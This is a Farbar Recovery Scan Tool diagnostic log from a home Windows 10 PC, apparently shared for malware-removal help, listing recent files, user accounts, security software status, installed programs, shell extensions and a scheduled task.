2017-11-12 21:50 - 2017-09-02 02:42 - 000954570 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-11-12 21:50 - 2017-09-02 02:41 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-11-12 21:50 - 2016-01-19 08:44 - 000000000 __SHD C:\Users\Charlie\IntelGraphicsProfiles
2017-11-12 21:47 - 2017-09-02 03:05 - 000003668 _____ C:\WINDOWS\System32\Tasks\AVG EUpdate Task
2017-11-12 21:46 - 2017-10-07 21:09 - 000252232 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2017-11-12 21:46 - 2017-10-07 21:09 - 000045504 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-11-12 21:46 - 2017-08-28 13:43 - 000110016 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-11-12 21:03 - 2017-09-15 14:21 - 000000000 ____D C:\AdwCleaner
2017-11-12 20:20 - 2017-09-02 03:05 - 000004162 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{24F6DFAD-F03B-41A2-9438-15B6B73060F2}
2017-11-12 20:17 - 2017-09-02 02:39 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-11-12 17:06 - 2016-01-19 09:10 - 000000008 __RSH C:\ProgramData\ntuser.pol
2017-11-12 17:03 - 2016-01-19 12:32 - 000000000 ____D C:\Users\Charlie\AppData\LocalLow\Temp
2017-11-12 17:02 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-11-12 17:02 - 2009-07-13 22:20 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2017-11-11 22:09 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\My Data Sources
2017-11-11 19:30 - 2017-02-13 08:52 - 000000000 ____D C:\Users\Charlie\Desktop\Noplock Contacts
2017-11-11 17:33 - 2017-03-18 16:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-11-11 17:33 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-11-10 18:35 - 2017-09-02 02:43 - 000000000 ____D C:\Users\Charlie
2017-11-10 12:05 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Outlook Files
2017-11-10 06:47 - 2017-03-18 16:03 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-11-10 06:40 - 2015-11-09 23:03 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2017-11-09 14:39 - 2016-01-19 08:44 - 000000000 ____D C:\Users\Charlie\AppData\Local\Packages
2017-11-09 11:38 - 2016-01-19 12:43 - 000000000 ____D C:\Users\Charlie\Desktop\MRN
2017-11-09 08:45 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Faith
2017-11-07 09:39 - 2017-03-18 16:01 - 000000000 ____D C:\WINDOWS\INF
2017-11-06 21:03 - 2017-06-04 09:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2017-11-06 20:53 - 2016-11-19 08:51 - 000000000 ____D C:\Users\Charlie\AppData\LocalLow\Mozilla
2017-11-06 20:48 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Finances
2017-11-04 21:22 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Retire
2017-11-04 07:42 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Farm
2017-11-01 20:49 - 2017-09-02 03:05 - 000003372 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1808445638-3246226358-2469192111-1000
2017-11-01 20:49 - 2016-01-19 08:47 - 000002417 _____ C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-11-01 20:49 - 2016-01-19 08:47 - 000000000 ___RD C:\Users\Charlie\OneDrive
2017-11-01 19:36 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-10-30 08:51 - 2016-01-19 12:40 - 000000000 ____D C:\Users\Charlie\AppData\Local\ElevatedDiagnostics
2017-10-29 23:33 - 2017-10-12 14:12 - 000000000 ____D C:\Program Files\Mozilla Firefox
2017-10-29 23:33 - 2016-01-19 12:25 - 000000000 ____D C:\Program Files (x86)\Java
2017-10-29 23:33 - 2016-01-19 09:16 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-10-26 18:32 - 2017-06-04 08:47 - 001022288 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgsnx.sys
2017-10-25 16:45 - 2016-01-19 12:22 - 000000000 ____D C:\ProgramData\Oracle
2017-10-25 16:36 - 2016-01-19 12:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-10-25 16:33 - 2017-05-10 11:54 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-10-25 13:41 - 2015-11-09 22:54 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2017-10-25 08:06 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-10-25 08:06 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-10-23 06:31 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Quicken
2017-10-20 06:25 - 2017-09-02 03:05 - 000004008 _____ C:\WINDOWS\System32\Tasks\Antivirus Emergency Update
2017-10-20 06:24 - 2017-06-04 08:47 - 000579584 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000548568 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetSec.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000355856 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000336896 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbloga.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000314640 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdrivera.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000193768 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000192584 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsha.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000166624 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbdiska.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000140192 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000102792 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000076832 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000051336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniva.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000039424 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgHwid.sys
2017-10-20 06:24 - 2016-01-19 12:21 - 000000000 ____D C:\ProgramData\AVG
2017-10-18 09:00 - 2017-03-18 15:51 - 000000000 ____D C:\WINDOWS\CbsTemp

==================== Files in the root of some directories =======

2016-12-01 12:59 - 2016-11-30 12:02 - 000012542 _____ () C:\Program Files (x86)\Common Files\client.wyc
2014-07-09 18:03 - 2016-01-21 15:23 - 021401112 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe
2014-07-11 08:11 - 2014-07-11 10:57 - 000037663 _____ () C:\Users\Charlie\AppData\Roaming\Microsoft Excel 97-2003.ADR
2017-09-02 02:41 - 2017-09-02 02:41 - 000000000 ____H () C:\ProgramData\DP45977C.lfl
2014-07-15 11:54 - 2016-11-21 15:21 - 000000934 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2017-09-27 06:24 - 2017-10-01 08:12 - 000000274 _____ () C:\ProgramData\ResPntListUNI.txt

Files to move or delete:
====================
C:\Users\Charlie\hpbcfgre.dll
C:\Users\Charlie\hpbuio32.dll
C:\Users\Charlie\hpbuio64.dll
C:\Users\Charlie\hpbuiodm64.dll
C:\Users\Charlie\hpmco175.dll
C:\Users\Charlie\hpmews02.dll
C:\Users\Charlie\hpmldm02.dll
C:\Users\Charlie\hpmprein.dll
C:\Users\Charlie\Install.dll
C:\Users\Charlie\Install.exe
C:\Users\Charlie\MRNOFXLOG.DAT
C:\Users\Charlie\mrn_SyncLog.dat


Some files in TEMP:
====================
2017-11-12 21:09 - 2017-09-05 00:26 - 001930840 _____ (Microsoft Corporation) C:\Users\Charlie\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-11-11 09:42

==================== End of FRST.txt ============================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-11-2017 03
Ran by Charlie (13-11-2017 09:28:48)
Running from C:\Users\Charlie\Desktop
Windows 10 Pro Version 1703 15063.674 (X64) (2017-09-02 08:16:44)
Boot Mode: Safe Mode (with Networking)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1808445638-3246226358-2469192111-500 - Administrator - Disabled)
Charlie (S-1-5-21-1808445638-3246226358-2469192111-1000 - Administrator - Enabled) => C:\Users\Charlie
DefaultAccount (S-1-5-21-1808445638-3246226358-2469192111-503 - Limited - Disabled)
Guest (S-1-5-21-1808445638-3246226358-2469192111-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1808445638-3246226358-2469192111-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AV: AVG Antivirus (Disabled - Out of date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Antivirus (Disabled - Out of date) {F620D48B-1497-73CC-F290-58052563BEAE}
FW: AVG Antivirus (Disabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (HKLM\...\{30689060-43BD-46E9-8A54-E6CDB18AAB88}) (Version: 20.2.1 - HP Inc.) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Active@ KillDisk 10 (HKLM\...\{6A633DB7-06E4-4EF1-8FD1-7F8812C590AD}_is1) (Version: 10 - LSoft Technologies Inc)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.012.20098 - Adobe Systems Incorporated)
Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.183 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.20)  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.20 - Adobe Systems Incorporated)
ANT Drivers Installer x64 (HKLM\...\{7664AF65-7B0D-4171-9F0F-50455278B428}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AVG (HKLM\...\{E61E6143-4937-43FC-8C12-06B8A987484D}) (Version: 1.211.3 - AVG Technologies) Hidden
AVG Internet Security (HKLM-x32\...\AVG Antivirus) (Version: 17.7.3032 - AVG Technologies)
AVG PC TuneUp (HKLM-x32\...\{A3DEEC4D-7D8A-465E-90BD-B853A19DDF82}) (Version: 16.75.1 - AVG Technologies) Hidden
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.75.3.10304 - AVG Technologies)
AVS Document Converter 2.3.1 (HKLM-x32\...\AVS Document Converter_is1) (Version: 2.3.1.232 - Online Media Technologies Ltd.)
AVS Photo Editor 2.2.1.140 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.2.1.140 - Online Media Technologies Ltd.)
Canon CanoScan LiDE 220 On-screen Manual (HKLM-x32\...\Canon CanoScan LiDE 220 On-screen Manual) (Version: 7.7.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.11.1 - Canon Inc.)
Canon LiDE 220 User Registration (HKLM-x32\...\Canon LiDE 220 User Registration) (Version:  - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 3.0.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 3.0.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.4.0 - Canon Inc.)
CanoScan LiDE 220 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ4811) (Version: 1.00 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.25 - Piriform)
Cisco Connect (HKLM-x32\...\Cisco Connect) (Version: 1.4.12068.0 - Cisco Consumer Products LLC)
Cisco WebEx Meetings (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.9.2.8 - Dell Inc.)
Dell Customer Connect (HKLM-x32\...\{04A41EBC-AB30-4574-A14D-E0CDFE31AB70}) (Version: 1.5.1.0 - Dell Inc.)
Dell Data Vault (HKLM\...\{2E55EEFD-2162-4A7D-9158-EDB0305603A6}) (Version: 4.3.7.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.61 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{3ED468C2-2235-4747-90AD-A7A34F0FE70A}) (Version: 1.2.2.8 - Dell)
Dell System Detect (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell)
Dell Update - SupportAssist Update Plugin (HKLM\...\{2228BC43-73DA-4F9A-BEE6-8E9C15328513}) (Version: 3.1.1.3832 - Dell Inc.)
Dell Update (HKLM-x32\...\{F91263FA-BE4D-439D-9C0A-2E7204E0E9E3}) (Version: 1.9.20.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.0 - Dropbox, Inc.)
Duplicate Photo Cleaner (HKLM\...\Duplicate Photo Cleaner_is1) (Version:  - WebMinds, Inc.)
EaseUS Partition Master 12.5 Trial Edition (HKLM-x32\...\EaseUS Partition Master Trial Edition_is1) (Version:  - EaseUS)
EasyDuplicateFinder v4.7 (HKLM\...\Easy Duplicate Finder 4_is1) (Version:  - WebMinds, Inc.)
Elevated Installer (HKLM-x32\...\{1052502B-4C91-43F9-B160-AE39ED57C9F0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden
FMW 1 (HKLM\...\{36133E9F-B129-4206-9FB4-13F707787542}) (Version: 1.226.3 - AVG Technologies) Hidden
Garmin Express (HKLM-x32\...\{BCC7CA85-E57F-452D-BB44-15A1CE018BD0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express (HKLM-x32\...\{bd8bd200-9a60-4969-b267-6b565f36e3da}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries)
Garmin Express Tray (HKLM-x32\...\{DA9C865D-6762-4931-8588-0B13B7A0796B}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 61.0.3163.100 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
HydraVision (HKLM-x32\...\{65589581-920C-CAE1-58C2-2149D3AA3F39}) (Version: 4.2.180.0 - ATI Technologies Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.7.3.1001 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
Java 8 Update 151 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180151F0}) (Version: 8.0.1510.12 - Oracle Corporation)
Laplink PCmover Professional (HKLM-x32\...\{99ADB194-BAD6-4787-AC22-A8E4A8346166}) (Version: 10.00.639 - Laplink Software, Inc.)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version:  - LastPass)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Malwarebytes version 3.2.2.2018 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.2.2.2018 - Malwarebytes)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.8625.2121 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation)
Microsoft OneNote Home and Student 2016 - en-us (HKLM\...\OneNoteFreeRetail - en-us) (Version: 16.0.8625.2121 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 56.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 56.0 (x86 en-US)) (Version: 56.0 - Mozilla)
Mozilla Firefox 56.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 56.0.2 (x64 en-US)) (Version: 56.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 56.0.1 - Mozilla)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.8326.2107 - Microsoft Corporation) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.330 - Qualcomm Atheros Communications)
Quicken 2015 (HKLM-x32\...\{00C2D443-43D9-4550-ABEA-318288E23E57}) (Version: 24.1.15.10 - Intuit)
Quicken WillMaker Plus 2014 (HKLM-x32\...\{44160FDE-C190-45C1-B8E1-23F00228E572}) (Version: 1.0.0.0 - Nolo)
Rapport (HKLM-x32\...\{1DD81E7D-0D28-4CEB-87B2-C041A4FCB215}) (Version: 3.5.1804.161 - Trusteer) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.)
Seagate Dashboard (HKLM-x32\...\{EA266F00-A8E7-43A0-8DED-FBFE3F076934}) (Version: 4.2.002.0 - Seagate)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
Trusteer Endpoint Protection (HKLM-x32\...\Rapport_msi) (Version: 3.5.1804.161 - Trusteer)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 4.0.4 - Tweaking.com)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
ZBot Trojan Remover v1.9.2 (HKLM-x32\...\ZBot Trojan Remover_is1) (Version: 1.9.2.0 - NoVirusThanks Company Srl)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files (x86)\AVG\Antivirus\ashShA64.dll [2017-10-20] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [AVG Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\AVG\AVG PC TuneUp\SDShelEx-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2013-05-27] (Online Media Technologies Ltd.)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers4: [AVG Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => C:\Program Files (x86)\AVG\AVG PC TuneUp\DseShExt-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers4: [AVG Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\AVG\AVG PC TuneUp\SDShelEx-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-03-13] (Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files (x86)\AVG\Antivirus\ashShA64.dll [2017-10-20] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> No File
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E9B0B5C-9FF3-4A29-8479-0868A68DD87B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
